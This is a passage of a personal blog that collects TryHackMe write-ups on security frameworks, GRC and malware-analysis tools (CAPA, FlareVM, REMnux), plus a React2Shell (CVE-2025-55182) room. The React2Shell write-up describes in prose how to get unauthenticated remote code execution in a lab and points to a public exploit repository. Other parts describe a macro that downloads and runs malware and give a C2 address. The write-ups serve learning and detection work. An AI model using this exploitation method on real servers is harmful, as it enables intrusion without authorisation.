Task 8: ConclusionWe have covered four distinct frameworks, each with unique applications

MITRE ATT&CK: Best for mapping real-world adversary tactics and testing existing controls.
DREAD: Best for numerical prioritisation of risks based on damage and exploitability.
STRIDE: Best for software development, focusing on categorising threats (Spoofing, Tampering, etc.).
PASTA: Best for a holistic, risk-centric approach that aligns with business objectives.

Leveraging these frameworks helps enhance threat awareness, prioritise mitigation, and improve overall organisational resilience.

I have completed the Threat Modelling room.

No answer needed

Learning Astro, Offensive Security, and CI/CD

Fri, 12 Dec 2025 00:00:00 GMT

Alhamdulillah for the blessing and opportunity in the form of skills, namely Astro Framework, Offensive Security, and CI/CD Workflow. Below are the details.

Astro Framework

Around 2 months were dedicated to learning Astro, starting from a simple question to an AI about what kind of web framework is very fast and secure, and the answer pointed to Astro. At first it was still doubtful, since among so many JS frameworks, choosing Astro felt unusual. After reading further, FreeCodeCamp, which once helped with learning responsive web design for free, also recommended Astro. That gave additional confidence.

During the learning process, it became clear that many large websites already use Astro, including Porsche. The community is also active and supportive. Joining the subreddit showed many people sharing the same surprise about how fast their sites become when built with Astro. More discussion about Astro Framework will probably come next time.

Offensive Security

Interest in cybersecurity has existed since college, even with a statistics background. Cybersecurity feels different, with a kind of adrenaline that makes learning exciting. Early 2025 became the moment to finally dedicate proper time to it. TryHackMe became one of the most visited platforms, recommended by both international and local communities such as Merdeka Siber. Its beginner friendly structure helped clarify many fundamentals. Even the OSI 7 layers, which used to be unclear, finally made sense and revealed how the web functions.

Further reading showed that cybersecurity is closely tied to write ups. One well known certification, OSCP, even allocates 12 hours for hacking and 12 hours for reporting, highlighting how important clear documentation is in the field.

CI/CD Workflow

CI/CD naturally followed after exploring Astro Framework. Hosting used to be confusing, especially coming from the usual WordPress plus shared hosting setup. Today, many providers offer free hosting even for SSR, such as Netlify and Cloudflare Pages. Netlify's 300 build minutes limit felt restrictive, especially when each build takes about a minute and content continues to grow.

GitHub Actions eventually became the preferred choice because it integrates directly with GitHub and offers more flexibility when the repository is public. Since making the repo public was not an issue, GitHub Actions became the main workflow, followed by purchasing a .com domain. A .dev domain was considered, but the scope of the work is broader than just development, so .com fit better.

Thank you for reading :)

Governance & Regulation | TryHackMe Write-Up

Thu, 11 Dec 2025 00:00:00 GMT

Here i want to share about my write-up for the room Governance & Regulation. Explore policies and frameworks vital for regulating cyber security in an organisation. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

Cybersecurity is a rapidly evolving landscape where malicious actors constantly exploit vulnerabilities to cause damage and steal data. To combat this, a comprehensive approach to information security governance and regulation is essential, involving robust policies, monitoring, and enforcement. This room aims to teach the importance of GRC (Governance, Risk Management & Compliance), relevant international laws and standards (ISO 27001, NIST 800-53), and how to improve security posture.

I am ready to start the room.

No answer needed

Task 2: Why is it important?

This section defines key terminologies: Governance (managing systems to achieve objectives), Regulation (rules enforced by governing bodies), and Compliance (adhering to laws). It details Information Security Governance processes such as Strategy, Policies, Risk Management, and Performance Measurement. It also lists key benefits like a robust security posture and stakeholder confidence, and provides examples of regulations like GDPR (Data Privacy), HIPAA (Healthcare), PCI-DSS (Financial), and GLBA.

A rule or law enforced by a governing body to ensure compliance and protect against harm is called?

Regulation

Health Insurance Portability and Accountability Act (HIPAA) targets which domain for data protection?

Healthcare

Task 3: Information Security Frameworks

Information security frameworks consist of documents that govern how security is managed. These include Policies (high-level goals), Standards (mandatory requirements), Guidelines (recommendations), Procedures (step-by-step tasks), and Baselines (minimum security levels). The development process involves identifying scope, research, drafting, review, implementation, and periodic updates. Real-world examples include creating Password Policies and Incident Response Procedures.

The step that involves monitoring compliance and adjust the document based on feedback and changes in the threat landscape or regulatory environment is called?

Review and update

A set of specific steps for undertaking a particular task or process is called?

Procedure

Task 4: Governance Risk and Compliance (GRC)

GRC is a holistic framework integrating Governance (strategy/direction), Risk Management (identifying and mitigating risks), and Compliance (meeting legal obligations). Developing a GRC program involves defining scope, conducting risk assessments, establishing governance processes, implementing controls (like Firewalls, IPS, IDS), and continuously monitoring and improving performance. In the financial sector, this includes Anti-Money Laundering policies and fraud risk management.

What is the component in the GRC framework involved in identifying, assessing, and prioritising risks to the organisation?

Risk Management

Is it important to monitor and measure the performance of a developed policy? (yea/nay)

yea

Task 5: Privacy and Data Protection

This section covers regulations protecting Personally Identifiable Information (PII).

GDPR: An EU regulation requiring prior approval for data collection, data minimization, and protection. It has tiered fines for non-compliance (Tier 1 can be up to 4% of revenue).
PCI DSS: A standard for securing card transactions (Visa, MasterCard, etc.), requiring strict access control and encryption for Cardholder Data (CHD).

[Image of GDPR Key Principles]

What is the maximum fine for Tier 1 users as per GDPR (in terms of percentage)?

4

In terms of PCI DSS, what does CHD stand for?

cardholder data

Task 6: NIST Special Publications

NIST 800-53: A catalog of security and privacy controls for information systems (e.g., Program Management). Compliance best practices include Discovery, Mapping controls to assets, and Governance.
NIST 800-63B: Guidelines for digital identity practices, focusing on authentication, verification, and credential management (passwords, biometrics).

Per NIST 800-53, in which control category does the media protection lie?

Physical

Per NIST 800-53, in which control category does the incident response lie?

Administrative

Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?

Map

Task 7: Information Security Management and Compliance

This task contrasts IS Management (planning/execution of security) with Compliance.

ISO/IEC 27001: An international standard for Information Security Management Systems (ISMS). Key components include Risk Assessment, Risk Treatment, and the Statement of Applicability (SoA).
SOC 2: An auditing framework by AICPA for service organizations, assessing controls based on the CIA triad and privacy. It assures clients that their data is handled securely.

Which ISO/IEC 27001 component involves selecting and implementing controls to reduce the identified risks to an acceptable level?

Risk treatment

In SOC 2 generic controls, which control shows that the system remains available?

Availability

Task 8: Conclusion

The room provided a comprehensive overview of governance and regulation frameworks used to protect organizational assets. It covered laws like GDPR and PCI DSS, the GRC framework, and enablers like ISO/IEC 27001 and NIST 800-53. The key takeaway is that while 100% security is unrealistic, robust policies and continuous improvement are essential for risk mitigation.

Click the View Site button at the top of the task to launch the static site in split view. What is the flag after completing the exercise?

THM{REDACTED}

React2Shell: CVE-2025-55182 | TryHackMe Write-Up

Wed, 10 Dec 2025 00:00:00 GMT

Here i want to share about my write-up for the room React2Shell: CVE-2025-55182, explore the CVE-2025-55182 vulnerability in React server components. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

This task introduces CVE-2025-55182, dubbed "React2Shell," a critical vulnerability (CVSS 10.0) affecting React Server Components (RSC) and frameworks like Next.js. The flaw allows unauthenticated remote code execution via a specific HTTP request due to an unsafe deserialization issue. To mitigate this, users must update vulnerable packages (like react-server-dom-webpack) to patched versions (e.g., 19.0.1+).

Having outlined the basics, let’s now dive into the key technical notes.

No answer needed

Task 2: Understanding React Server Components and the Flight Protocol

This section explains the architecture of React Server Components (RSC), where components are rendered on the server for performance. The server-client communication relies on the React Flight protocol, which handles data serialization using specific markers like $@ (for chunk references) and $B (for Blob references). The vulnerability stems from the server processing these references without properly validating if the requested properties are legitimate exports.

What is the symbol that denotes a Blob reference?

$B

Task 3: The Core Vulnerability: Unsafe Deserialization

CVE-2025-55182 is identified as an unsafe deserialization vulnerability located in the requireModule function of the react-server-dom-webpack package. The flaw exists because the code uses bracket notation (moduleExports[metadata[2]]) without validation. This allows an attacker to traverse the prototype chain (e.g., accessing .constructor) and obtain a reference to the global Function constructor, enabling arbitrary code execution.

To deepen our understanding, let’s now study the exploitation chain through a proof-of-concept code analysis.

No answer needed

Task 4: The Exploitation Chain: From Deserialization to Remote Code Execution

This task breaks down the exploit into three stages:

Creating a Fake Chunk: The attacker constructs a malicious object that references itself via the then property.
Exploiting the Blob Handler: Using the $B reference, the exploit triggers a function call (_formData.get) on the malicious object, which has been polluted to point to the Function constructor.
Achieving Code Execution: The payload (e.g., a Node.js execSync command) is passed to the Function constructor, executing the arbitrary command on the system.

Let’s analyse an actual proof-of-concept exploit in the next task.

No answer needed

Task 5: Analysing an Actual Proof-of-Concept

The content analyzes the raw HTTP POST request used for the attack. It requires the Next-Action: x header to trigger server-side processing. The body uses multipart/form-data containing three specific parts: the fake chunk object with the payload, a reference to that object ($@0), and an empty array. This vulnerability is highly critical because it affects default Next.js configurations and requires no authentication.

It’s time to see the exploit in action.

No answer needed

Task 6: Exploitation

In this practical task, users are instructed to use Burp Suite to attack a target VM on port 3000. The goal is to send the malicious payload to execute remote commands. The provided payload uses execSync to run the id command and returns the output in the server's response. The user must then modify the payload to read a flag located in /etc.

Burp Suite is launched using a temporary project.

Burp Suite initializes and loads the project environment.

You can confirm that you can view the app’s home page by visiting [IP_ADRESS]:3000. Now, it is time to exploit it. At the time of writing, our preferred choice is a payload that allows us to view the command execution result in the server’s response, as obtained from https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

A new Repeater tab is opened to craft the exploit request.

The malicious RSC payload is inserted into the request body.

The payload is modified to run ls /etc to search for the flag file.

The target IP and port (10.48.153.181:3000) are configured correctly.

What is the name of the user running the vulnerable app?

ubuntu

The server response reveals the user information from the id command.

Listing /etc shows the presence of flag.txt.

Reading the file with cat /etc/flag.txt reveals the final flag.

What is the flag in /etc?

THM{}

Task 7: Detection

This section provides methods for detecting React2Shell attacks. The primary indicators are the presence of the Next-Action header combined with multipart/form-data containing specific suspicious JSON keys (like "status": "resolved_model" or "$1:__proto__:then"). A Snort rule is provided to detect these network signatures, and an OSQuery snippet is offered to scan endpoints for vulnerable versions of react-server-dom-* packages.

I've read and am aware of the various elements that can be used to detect this vulnerability within my environment.

No answer needed

Task 8: Conclusion

The conclusion reminds users to only perform penetration tests with explicit permission. It notes that many PoCs found online for this CVE are fake or broken. A valid PoC requires the specific vulnerable library versions (e.g., React 19.2.0, Next 16.0.6). The recommended mitigation is to run npm audit and upgrade servers to patched versions immediately.

If you enjoyed this room, consider checking other rooms in the Recent Threats module.

No answer needed

CAPA: The Basics | TryHackMe Write-Up

Mon, 06 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room CAPA: The Basics (Premium Room), learn to use CAPA to identify malicious capabilities. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

CAPA is a tool designed to identify the capabilities present in executable files. It analyzes a file and applies a set of rules that describe common behaviors, allowing it to determine what the program is capable of doing, such as network communication, file manipulation, or process injection. The tool encapsulates years of reverse engineering knowledge, allowing analysts to quickly understand a program's functionality without manually reverse engineering the code.

I'm excited to learn more about CAPA!

No answer needed

Task 2: Tool Overview: How CAPA Works

The two most used parameters are -v (verbose) and -vv (very verbose), which give a more detailed result but increase processing time.

The output of the command includes tables showing the file's hashes (MD5, SHA1, SHA256) and mappings to frameworks like ATT&CK and MBC, followed by a detailed list of the program's Capabilities.

What command-line option would you use if you need to check what other parameters you can use with the tool? Use the shortest format.

-h

What command-line options are used to find detailed information on the malware's capabilities? Use the shortest format.

-v

What command-line options do you use to find very verbose information about the malware's capabilities? Use the shortest format.

-vv

What PowerShell command will you use to read the content of a file?

Get-Content

Task 3: Dissecting CAPA Results Part 1: General Information, MITRE and MAEC

This text dissects the results of running CAPA on the cryptbot.bin file.

The first block contains basic information about the file, including its cryptographic hashes (md5, sha1, sha256), the analysis type (static), the OS (windows), format (pe), architecture (i386), and the file path.S

The second block maps the file's capabilities to the MITRE ATT&CK framework, a knowledge base that documents the tactics and techniques used by threat actors. This helps analysts map the file's behavior to an adversary's playbook.

The third block uses MAEC (Malware Attribute Enumeration and Characterization), a specialized language for describing malware. The text highlights two common MAEC values used by CAPA:

What is the sha256 of cryptbot.bin?

ae7bc6b6f6ecb206a7b957e4bb86e0d11845c5b2d9f7a00a482bef63b567ce4c

What is the Technique Identifier of Obfuscated Files or Information?

T1027

Task 4: Dissecting CAPA Results Part 2: Malware Behavior Catalogue

The Malware Behavior Catalogue (MBC) serves as a catalogue of malware objectives and behaviors to support malware analysis, labelling, and reporting. It can link to ATT&CK methods but does not duplicate ATT&CK information.

MBC content is represented in two formats:

OBJECTIVE::Behavior::Method[Identifier]
OBJECTIVE::Behavior::[Identifier]

The components are defined as follows:

Objective: Based on ATT&CK tactics but tailored for malware analysis, with additions like Anti-Behavioral Analysis and Anti-Static Analysis.
Micro-Objective: Associated with micro-behaviors—actions that aren't necessarily malicious on their own but are often abused. Examples include PROCESS, MEMORY, COMMUNICATION, and DATA.
MBC Behaviors: A list of behaviors (e.g., Virtual Machine Detection) and micro-behaviors (e.g., Create Process).
Methods: Details tied to behaviors, which can be considered sub-techniques (e.g., Stack Strings is a method for Executable Code Obfuscation).

What serves as a catalogue of malware objectives and behaviours?

Malware Behavior Catalogue

Which field is based on ATT&CK tactics in the context of malware behaviour?

Objective

What is the Identifier of "Create Process" micro-behavior?

C0017

What is the behaviour with an Identifier of B0009?

Virtual Machine Detection

Malware can be used to obfuscate data using base64 and XOR. What is the related micro-behavior for this?

Encode Data

Which micro-behavior refers to "Malware is capable of initiating HTTP communications"?

HTTP Communication

Task 5: Dissecting CAPA Results Part 3: Namespaces

CAPA uses namespaces to group items with the same purpose. The output shows a table with two columns: Capability and Namespace. The namespace has a hierarchical format, consisting of a Top-Level Namespace (TLN) and a more specific namespace. For example, anti-analysis is a TLN, and anti-vm/vm-detection is a namespace under it.

anti-analysis: Contains rules to detect behaviors used by malware to evade analysis, such as obfuscation, packing, and anti-debugging.
host-interaction: Contains rules related to interactions with the host system, like file system or process manipulation.
persistence: Contains rules for behaviors associated with maintaining access on a compromised system.
nursery: A staging ground for rules that are not quite polished.

Which top-level Namespace contains a set of rules specifically designed to detect behaviours, including obfuscation, packing, and anti-debugging techniques exhibited by malware to evade analysis?

anti-analysis

Which namespace contains rules to detect virtual machine (VM) environments? Note that this is not the TLN or Top-Level Namespace.

anti-vm/vm-detection

Which Top-Level Namespace contains rules related to behaviours associated with maintaining access or persistence within a compromised system? This namespace is focused on understanding how malware can establish and maintain a presence within a compromised environment, allowing it to persist and carry out malicious activities over an extended period.

persistence

Which namespace addresses techniques such as String Encryption, Code Obfuscation, Packing, and Anti-Debugging Tricks, which conceal or obscure the true purpose of the code?

obfuscation

Which Top-Level Namespace Is a staging ground for rules that are not quite polished?

Nursery

Proceed to the next task for the 2nd part of the discussion!

No answer needed

Task 6: Dissecting CAPA Results Part 4: Capability

What rule yaml file was matched if the Capability or rule name is check HTTP status code?

check-http-status-code.yml

What is the name of the Capability if the rule YAML file is reference-anti-vm-strings.yml?

reference anti-VM strings

Which TLN or Top-Level Namespace includes the Capability or rule name run PowerShell expression?

load-code

Check the conditions inside the check-for-windows-sandbox-via-registry.yml rule file from this link. What is the value of the API that ends in Ex is it looking for?

RegOpenKeyEx

Task 7: More Information, more fun

To determine the reason for triggering CAPA's rules and the conditions involved, we can use the -vv (very verbose) parameter.

Since the output is vast and challenging to analyze in a terminal, a two-step process is used:

First, use the -j and -vv parameters to direct the output to a .json file. The command is capa.bin -j -vv .\cryptbot.bin > cryptbot_vv.json. A pre-processed file named cryptbot_vv.json is provided.
Second, upload the generated .json file to the CAPA Web Explorer. An offline version is available on the virtual machine.

Which parameter allows you to output the result of CAPA into a .json file? -j

What tool allows you to interactively explore CAPA results in your web browser? CAPA Web Explorer

CAPA Web Explorer

Which feature of this CAPA Web Explorer allows you to filter options or results?

Global Search Box

Task 8: Conclusion

No answer needed

FlareVM: Arsenal of Tools | TryHackMe Write-Up

Mon, 06 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room FlareVM: Arsenal of Tools (Premium Room), learn the arsenal of investigative tools in FlareVM. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

FlareVM, which stands for "Forensics, Logic Analysis, and Reverse Engineering," is a curated collection of specialized tools designed for reverse engineers, malware analysts, incident responders, forensic investigators, and penetration testers, created by the FLARE Team at FireEye.

I'm ready to learn more about FlareVM!

No answer needed

Task 2: Arsenal of Tools

Introduces specialized forensics, incident response, and malware investigation tools found inside the FlareVM. The tools are grouped by their category.

Reverse Engineering & Debugging: Includes tools like Ghidra, x64dbg, OllyDbg, and Radare2.
Disassemblers & Decompilers: Includes CFF Explorer and RetDec.
Static & Dynamic Analysis: Includes Process Hacker, PEview, and Dependency Walker.
Forensics & Incident Response: Includes Volatility, Rekall, and FTK Imager.
Network Analysis: Includes Wireshark, Nmap, and Netcat.
File Analysis: Includes FileInsight and HxD.
Scripting & Automation: Includes Python and PowerShell Empire.
Sysinternals Suite: A collection of utilities including Autoruns, Process Explorer, and Process Monitor.

Which tool is an Open-source debugger for binaries in x64 and x32 formats?

x64dbg

What tool is designed to analyze and edit Portable Executable (PE) files?

CFF Explorer

Which tool is considered a sophisticated memory editor and process watcher?

Process Hacker

Which tool is used for Disc image acquisition and analysis for forensic use?

FTK Imager

What tool can be used to view and edit a binary file?

HxD

Task 3: Commonly Used Tools for Investigation: Overview

Introduces several basic tools used for initial digital forensics and malware investigations.

Procmon (Process Monitor): Tool for tracking system activity in real-time, including the file system, registry, and thread/process activity.
Process Explorer: Allows you to see the process parent-child relationship, DLLs loaded, and its path.
HxD: Xex editor used to examine or alter malicious files. An example shows how it can identify an executable by its starting bytes (4D 5A).
Wireshark: Used for observing and investigating network traffic to look for unusual activity.
CFF Explorer: Can generate file hashes for integrity verification and validate system files.
PEStudio: Used for static analysis, which is studying executable file properties without running the files. It can show information like a file's entropy.
FLOSS (FLARE Obfuscated String Solver): Extracts and de-obfuscates all strings from malware programs using advanced static analysis techniques.

Which tool was formerly known as FireEye Labs Obfuscated String Solver?

FLOSS

Which tool offers in-depth insights into the active processes running on your computer?

Process Explorer

By using the Process Explorer (procexp) tool, under what process can we find smss.exe?

System

Which powerful Windows tool is designed to help you record issues with your system's apps?

Procmon

Which tool can be used for Static analysis or studying executable file properties without running the files?

PEStudio

Using the tool PEStudio to open the file cryptominer.bin in the Desktop\Sample folder, what is the sha256 value of the file?

E9627EBAAC562067759681DCEBA8DDE8D83B1D813AF8181948C549E342F67C0E

Using the tool PEStudio to open the file cryptominer.bin in the Desktop\Sample folder, how many functions does it have?

102

What tool can generate file hashes for integrity verification, authenticate the source of system files, and validate their validity?

CFF Explorer

Using the tool CFF Explorer to open the file possible_medusa.txt in the Desktop\Sample folder, what is the MD5 of the file?

646698572AFBBF24F50EC5681FEB2DB7

Use the CFF Explorer tool to open the file possible_medusa.txt in the Desktop\Sample folder. Then, go to the DOS Header Section. What is the e_magic value of the file?

5A4D

Task 4: Analyzing Malicious Files

This task involves performing an analysis on a suspicious windows.exe file, beginning with static analysis.

Using PEStudio, several suspicious indicators are identified:

The file's metadata, claiming it's the "Windows Registry Editor (REGEDIT)," is suspicious due to its download location and the presence of Russian text.
The absence of a rich header indicates the file is potentially packed or obfuscated.
The functions tab lists blacklisted API calls related to process execution (set_UseShellExecute) and cryptography (CryptoStream, RijndaelManaged).

Using FLOSS with the command FLOSS.exe .\windows.exe > windows.txt, the extracted strings confirm the presence of the same functions found by PEStudio.

The text then demonstrates dynamic analysis on a different file, cobaltstrike.exe.

Process Explorer is used to find the running process and check its TCP/IP properties tab to identify network connections.
Procmon is used with a filter to verify the connection. It confirms the binary was making a connection to an unknown IP address, 47.120.46.210.

Using PEStudio, open the file windows.exe. What is the entropy value of the file windows.exe?

7.999

Using PEStudio, open the file windows.exe, then go to manifest (administrator section). What is the value under requestedExecutionLevel?

requireAdministrator

Which function allows the process to use the operating system's shell to execute other processes?

set_UseShellExecute

Which API starts with R and indicates that the executable uses cryptographic functions?

RijndaelManaged

What is the Imphash of cobaltstrike.exe?

92EEF189FB188C541CBD83AC8BA4ACF5

What is the defanged IP address to which the process cobaltstrike.exe is connecting?

47[.]120[.]46[.]210

Let's open file .pcapng and apply the filter ip.addr == [IP_ADDRESS]

What is the destination port number used by cobaltstrike.exe when connecting to its C2 IP Address?

81

During our analysis, we found a process called cobaltstrike.exe. What is the parent process of cobaltstrike.exe?

explorer.exe

Task 5: Conclusion

Fantastic Room! No answer needed

REMnux: Getting Started | TryHackMe Write-Up

Mon, 06 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room REMnux: Getting Started (Premium Room), learn how you can use the tools inside the REMnux VM. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

The REMnux VM is a specialised Linux distro that provides a sandbox-like environment for dissecting potentially malicious software without risking your primary system. It already includes tools like Volatility, YARA, Wireshark, oledump, and INetSim.

Proceed with the next tasks to learn more!

No answer needed

Task 2: Machine Access

To complete this task, we will use the AttackBox and the attached virtual machine.

I'm excited to learn more about the tools inside the REMnux VM!

No answer needed

Task 3: File Analysis

Running oledump.py agenttesla.xlsm shows the file's data streams. A stream marked with a capital M indicates a Macro. To view the macro in a readable format, the command oledump.py agenttesla.xlsm -s 4 --vbadecompress is used.

Inside the decompressed script, a variable named Sqtnew contains an obfuscated PowerShell command. This command is deobfuscated using CyberChef's Find/Replace operation to remove the * and ^ characters.

The final, deobfuscated PowerShell command uses Invoke-WebRequest to download a file named Doc-3737122pdf.exe from the IP address. It then uses Start-Process to execute the downloaded file.

What Python tool analyzes OLE2 files, commonly called Structured Storage or Compound File Binary Format?

oledump.py

What tool parameter we used in this task allows you to select a particular data stream of the file we are using it with?

-s

During our analysis, we were able to decode a PowerShell script. What command is commonly used for downloading files from the internet?

Invoke-WebRequest

What file was being downloaded using the PowerShell script?

Doc-3737122pdf.exe

During our analysis of the PowerShell script, we noted that a file would be downloaded. Where will the file being downloaded be stored?

$TempFile

Using the tool, scan another file named possible_malicious.docx located in the /home/ubuntu/Desktop/tasks/agenttesla/ directory. How many data streams were presented for this file?

16

Using the tool, scan another file named possible_malicious.docx located in the /home/ubuntu/Desktop/tasks/agenttesla/ directory. At what data stream number does the tool indicate a macro present?

8

Task 4: Fake Network to Aid Analysis

This uses INetSim (Internet Services Simulation Suite) to simulate a real network for dynamic analysis. It involves two machines: a REMnux VM running INetSim and an AttackBox to act as the client.

First, INetSim is configured by editing /etc/inetsim/inetsim.conf and changing the dns_default_ip value to the REMnux machine's IP address. The simulation is then started with the command sudo inetsim.

From the AttackBox, malware behavior is mimicked by downloading a secondary file from the INetSim server using the wget command, for example: sudo wget https://10.201.58.151/second_payload.zip --no-check-certificate.

Finally, after stopping INetSim, it creates a connection report in the /var/log/inetsim/report/ directory. This report can be read using the cat command and shows all the connections made, including the requested URL, protocol, and the fake file that was served.

Download and scan the file named flag.txt from the terminal using the command sudo wget https://10.201.58.151/flag.txt --no-check-certificate. What is the flag? Tryhcakme{______________}

After stopping the inetsim, read the generated report. Based on the report, what URL Method was used to get the file flag.txt?

get

Task 5: Memory Investigation: Evidence Preprocessing

This task covers the preprocessing of evidence from a memory image named wcry.mem using the Volatility 3 tool.

Several individual plugins are demonstrated, including:

windows.pstree.PsTree: Lists processes in a tree.
windows.pslist.PsList: Lists all currently active processes.
windows.cmdline.CmdLine: Lists process command line arguments.

To process the evidence in bulk, a for loop is used in the terminal to run multiple plugins at once and save each output to a separate text file. The command used is: for plugin in [plugin_list]; do vol3 -q -f wcry.mem $plugin > wcry.$plugin.txt; done

What plugin lists processes in a tree based on their parent process ID?

PsTree

What plugin is used to list all currently active processes in the machine?

PsList

What Linux utility tool can extract the ASCII, 16-bit little-endian, and 16-bit big-endian strings?

Strings

By running vol3 with the Malfind parameter, what is the first (1st) process identified suspected of having an injected code?

csrss.exe

Continuing from the previous question (Question 4), what is the second (2nd) process identified suspected of having an injected code?

winlogon.exe

By running vol3 with the DllList parameter, what is the file path or directory of the binary @<WanaDecryptor@.exe>?

C:\Intel\ivecuqmanpnirkt615

Task 6: Conclusion

Fantastic room indeed!

No answer needed

Security Principles | TryHackMe Write-Up

Mon, 06 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room Security Principles, learn about the security triad and common security models and principles. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

It is impossible to achieve perfect security, as no solution is 100% secure; therefore, the goal is to make it more difficult for adversaries to gain access.

Think how you would describe something as secure.

No answer needed

Task 2: CIA

Confidentiality ensures that only the intended persons or recipients can access the data.
Integrity aims to ensure that the data cannot be altered, and that any alteration can be detected.
Availability aims to ensure that the system or service is available when needed.

Beyond the CIA security triad, two additional concepts are:

Authenticity: Ensuring that the data is from the claimed source.
Nonrepudiation: Ensuring that the original source cannot deny that they are the source of the data.

Donn Parker proposed the Parkerian Hexad, a set of six security elements that includes the above and adds two more:

Utility: Focuses on the usefulness of the information.
Possession: Requires that we protect information from unauthorized taking, copying, or controlling.

Click on "View Site" and answer the five questions. What is the flag that you obtained at the end?

THM{________}

Task 3: DAD

The opposite of the CIA Triad (Confidentiality, Integrity, Availability) is the DAD Triad: Disclosure, Alteration, and Destruction.

Disclosure is the opposite of confidentiality. An example is an attacker stealing medical records and dumping them online.
Alteration is the opposite of Integrity. An example is an attacker modifying patient medical records, which could be life-threatening.
Destruction/Denial is the opposite of Availability. An example is an attacker making database systems unavailable, stalling a whole facility.

The attacker managed to gain access to customer records and dumped them online. What is this attack?

Disclosure

A group of attackers were able to locate both the main and the backup power supply systems and switch them off. As a result, the whole network was shut down. What is this attack?

Destruction/Denial

Task 4: Fundamental Concepts of Security Models

Three foundational security models used to create systems that ensure security functions.

Bell-LaPadula Model: Aims to achieve confidentiality. Its primary rules are the "Simple Security Property" (no read up), which states a subject at a lower security level cannot read an object at a higher level, and the "Star Security Property" (no write down), which states a subject at a higher level cannot write to an object at a lower level.
Biba Model: Aims to achieve integrity. Its primary rules are the "Simple Integrity Property" (no read down), where a higher integrity subject should not read from a lower integrity object, and the "Star Integrity Property" (no write up), where a lower integrity subject should not write to a higher integrity object.
Clark-Wilson Model: Also aims to achieve integrity. It uses concepts like the Constrained Data Item (CDI), Unconstrained Data Item (UDI), Transformation Procedures (TPs), and Integrity Verification Procedures (IVPs).

Click on "View Site" and answer the four questions. What is the flag that you obtained at the end?

THM{_______________}

Task 5: Defence-in-Depth

Defence-in-Depth refers to creating a security system of multiple levels; hence it is also called Multi-Level Security.

Make sure you have read the above.

No answer needed

Task 6: ISO/IEC 19249

Lists five architectural principles:

Domain Separation: Every set of related components is grouped as a single entity or domain.
Layering: A system is structured into many abstract levels or layers, making it possible to impose security policies at different levels.
Encapsulation: Hiding low-level implementations and preventing direct manipulation of data.
Redundancy: This principle ensures availability and integrity.
Virtualization: Sharing a single set of hardware among multiple operating systems, which provides sandboxing capabilities.

It also lists five design principles:

Least Privilege: Should provide the least amount of permissions for someone to carry out their task and nothing more.
Attack Surface Minimisation: Aim to minimize vulnerabilities that an attacker might use, for example, by disabling any service we don’t need.
Centralized Parameter Validation: The validation of parameters should be centralized within one library or system.
Centralized General Security Services: As a security principle, we should aim to centralize all security services.
Preparing for Error and Exception Handling: Systems should be designed to fail safe, and error messages should not leak confidential information.

Which principle are you applying when you turn off an insecure server that is not critical to the business?

2 Attack Surface Minimisation

Your company hired a new sales representative. Which principle are they applying when they tell you to give them access only to the company products and prices?

1 Least Privilege

While reading the code of an ATM, you noticed a huge chunk of code to handle unexpected situations such as network disconnection and power failure. Which principle are they applying?

5 Preparing for Error and Exception Handling

Task 7: Zero Trust versus Trust but Verify

The Trust but Verify principle teaches that we should always verify an entity and its behavior, even when we trust it. Verifying requires setting up proper logging and using automated security mechanisms like intrusion detection systems.

The Zero Trust principle treats trust as a vulnerability and tries to eliminate it, teaching, “never trust, always verify.” Every entity is considered adversarial until proven otherwise, and it does not grant trust based on location or ownership. Authentication and authorization are required before accessing any resource. Microsegmentation, where a network segment can be as small as a single host, is one of its implementations.

Make sure you have read the above.

No answer needed

Task 8: Threat versus Risk

Vulnerability: In information security, a vulnerability is a weakness.
Threat: A threat is a potential danger associated with this weakness or vulnerability.
Risk: The risk is concerned with the likelihood of a threat actor exploiting a vulnerability and the consequent impact on the business.

An example is given of a showroom with glass doors (vulnerability). There is a threat that the glass can be broken, and the owners must consider the risk, which is the likelihood of the glass breaking and the resulting impact on the business.

Make sure you have read the above.

No answer needed

Task 9: Conclusion

Make sure you have taken notes of all the key terms and acronyms we covered in this room.

No answer needed

CyberChef: The Basics | TryHackMe Write-Up

Thu, 02 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room CyberChef: The Basics, this room is an introduction to CyberChef, the Swiss Army knife for cyber security professionals. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

CyberChef is a simple, intuitive web-based application designed to help with various “cyber” operation tasks within our web browser.

Proceed with the next tasks to learn more!

No answer needed

Task 2: Accessing the Tool

There are different ways to access and run CyberChef.

Online Access
Offline or Local Copy

https://gchq.github.io/CyberChef/

I have access to CyberChef and I’m ready to dive into it.

No answer needed

Task 3: Navigating the Interface

CyberChef consists of four areas. Each consists of different components or features.

Operations
Recipe
Input
Output

In which area can you find "From Base64"?

operations

Which area is considered the heart of the tool?

Recipe

Task 4: Before Anything Else

The thought process when using CyberChef consists of four different steps:

Setting a clear objective
Put your data into the input area
Select the Operations you want to use
Check the output to see if it is the intended result

At which step would you determine, "What do I want to accomplish?

1

Task 5: Practice, Practice, Practice

This text explores commonly used operation categories: Extractors, Date / Time, and Data format.

Extractors: This category includes operations to Extract IP addresses, Extract URLs, and Extract email addresses from input.
Date / Time: This category includes operations to convert From UNIX Timestamp to a datetime string and To UNIX Timestamp from a datetime string.
Data Format: This category includes base encodings like From Base64, From Base85, From Base58, To Base62, and the URL Decode operation.

What is the hidden email address?

hidden@hotmail.com

What is the hidden IP address that ends in .232?

102.20.11.232

Which domain address starts with the letter "T"?

TryHackMe.com

To convert a decimal number to its binary equivalent, we can use the repeated division-by-2 method. We continuously divide the decimal number by 2 and record the remainder until the result is 0. The binary number is then formed by reading the remainders in reverse order (from bottom to top).

Here’s the step-by-step conversion for the number 78:

78 ÷ 2 = 39 with a remainder of 0
39 ÷ 2 = 19 with a remainder of 1
19 ÷ 2 = 9 with a remainder of 1
9 ÷ 2 = 4 with a remainder of 1
